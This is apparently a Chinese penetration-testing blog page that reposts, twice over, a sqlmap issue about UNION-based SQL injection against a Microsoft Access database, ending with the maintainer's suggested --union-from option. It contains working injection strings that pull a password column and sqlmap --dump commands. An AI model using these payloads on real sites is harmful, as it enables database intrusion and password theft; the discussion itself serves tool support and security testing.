- 浏览: 287566 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
https://github.com/sqlmapproject/sqlmap/issues/423
Valid statements that show the numbers in the resulting html page:
...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
- - foobar is an existing table (gathered via error messages in html)
- - password is a valid column in the foobar table
The following URL gives you one password:
...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
from foobar
Now I wanted to hand over to sqlmap to dump all passwords:
sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
- --dump
which did not work out (0 entries retrieved), but it was confirmed
that the table has several hundred entries.
- - sqlmap was able to detect the number of columns is 13 (correct)
- - sqlmap confirmed a bolean-based blind sqli vulnerability (but no
UNION based sqli)
- - sqlmap was able to confirm the existence of table name (with --tables)
(echo foobar > txt/common-tables.txt)
- - sqlmap was able to confirm the existence of column name password
(with --colums)
When running something like:
- --technique=U --union-cols=13 --union-char=1
sqlmap requested something *like*:
...id=-123 union all select
1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
MSysAccessObjects%00
which results in the following error message (shown in the html page):
The Microsoft Jet database engine cannot find the input table or query
'MSysAccessObjects'. Make sure it exists and that its name is spelled
correctly.
So if sqlmap would accept a known tablename on the command line that
it would use to detect/confirm the union based sqli vuln, instead of
using "MSysAccessObjects" this would make sqlmap more useful
(or simply use the table name specified in -T or previously
bruteforced to detect union-based sqli).
solution:
引用
Valid statements that show the numbers in the resulting html page:
...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
- - foobar is an existing table (gathered via error messages in html)
- - password is a valid column in the foobar table
The following URL gives you one password:
...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
from foobar
Now I wanted to hand over to sqlmap to dump all passwords:
sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
- --dump
which did not work out (0 entries retrieved), but it was confirmed
that the table has several hundred entries.
- - sqlmap was able to detect the number of columns is 13 (correct)
- - sqlmap confirmed a bolean-based blind sqli vulnerability (but no
UNION based sqli)
- - sqlmap was able to confirm the existence of table name (with --tables)
(echo foobar > txt/common-tables.txt)
- - sqlmap was able to confirm the existence of column name password
(with --colums)
When running something like:
- --technique=U --union-cols=13 --union-char=1
sqlmap requested something *like*:
...id=-123 union all select
1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
MSysAccessObjects%00
which results in the following error message (shown in the html page):
The Microsoft Jet database engine cannot find the input table or query
'MSysAccessObjects'. Make sure it exists and that its name is spelled
correctly.
So if sqlmap would accept a known tablename on the command line that
it would use to detect/confirm the union based sqli vuln, instead of
using "MSysAccessObjects" this would make sqlmap more useful
(or simply use the table name specified in -T or previously
bruteforced to detect union-based sqli).
solution:
引用
Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads
发表评论
-
linux 安装scrapy
2015-09-07 13:06 600由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 416based on our case, we need to h ... -
wpscan
2015-08-01 10:39 434https://www.digitalocean.com/co ... -
arachni-web-ui使用
2015-06-10 01:04 2145最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 340http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 337解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 449原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 428http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 580原文地址:https://blog.netspi.com/du ... -
[转]Microsoft Access sqli
2015-03-18 00:57 435https://milo2012.wordpress.com/ ... -
crossdomain.xml
2015-03-12 01:23 669参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4125原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 848原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 642http://digi.ninja/blog/zap_web_ ... -
memcached
2015-01-25 01:56 0http://www.sensepost.com/blog/4 ... -
[译]linux使用软连接读取本地文件
2015-01-25 00:28 1970原文地址:http://josipfranjkovic.blo ... -
linux install firefix&plugin
2015-01-22 20:56 4531. download firefox&plugins ... -
Sinatra--超级轻量级web框架
2015-01-17 00:30 658Sinatra是一个超轻量级web框架 介绍:http://w ... -
Shellshock示例
2014-12-19 01:21 316来自:http://pastebin.com/Qbgn09Wa ... -
使用Tesseract 识别验证码
2014-12-10 00:48 793参考: http://code.google.com/p/te ...
相关推荐
Kali Linux 下 SQLmap 注入 ACCESS 数据库 Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面...
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
### SQLMap注入详解知识点 #### 一、SQLMap概述 - **定义与功能**:SQLMap是一款免费且开源的渗透测试工具,专为自动化检测和利用SQL注入漏洞而设计,并进一步接管数据库服务器。该工具拥有强大的检测引擎以及一...
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL、 Oracle、 PostgreSQL、 Microsoft SQL Server、 Microsoft Access 等主流数据库。 Sqlmap 使用 5 ...
Sqlmap不仅支持多种数据库管理系统,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix,还具备一系列高级功能。比如,它能...
SQLMap支持多种数据库管理系统(DBMS),包括MySQL、Microsoft SQL Server (MSSQL)、Access、DB2以及Oracle等。它能够自动识别目标网站所使用的数据库类型,然后针对性地应用相应的SQL语句进行测试。这大大提高了...
- Microsoft Access - IBM DB2 - SQLite - Firebird - Sybase - SAP MaxDB #### 获取与安装SQLMap 用户可以通过以下几种方式获取SQLMap: - 从官方网站下载最新版本:...
- **Microsoft Access**:支持Access数据库。 - **DB2**:支持IBM DB2数据库系统。 - **Informix**:支持Informix数据库。 - **Sybase**:支持Sybase数据库。 #### 三、SQL注入技术 SQLmap支持多种SQL注入技术: ...
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
SQLMap是一款自动化SQL注入和数据库指纹识别的工具,它支持多种数据库系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等。sqlmap的-...
全面支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB数据库管理系统。 全面支持六种SQL注入技术:boolean-based盲注、time-based盲注、error...
Sqlmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等。它全面覆盖了不同类型的SQL注入技术...
一.SQLmap安装Sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定url的sql注入漏洞,内置了很多绕过插件,支持的数据库是MYSQL、Oracle、postgreSQL、Microsoft SQL server、Microsoft Access、IBM...
Sqlmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB等。 Sqlmap的注入技术涵盖了多种方法,如基于...
ASP+Access网站SQL注入利用 在本节中,我们将探讨针对ASP+Access网站的SQL注入利用。ASP(Active Server Pages)是微软公司开发的服务器端脚本环境,用于创建动态交互式网页并建立强大的web应用程序。Access是微软...
除此之外,Sqlmap 还支持文件型数据库,例如 SQLite、Microsoft Access、Firebird 等。使用以下命令直连文件型数据库: `python sqlmap.py -d "sqlite:///path/to/database.db"` 2.Sqlmap URL 探测 Sqlmap 可以...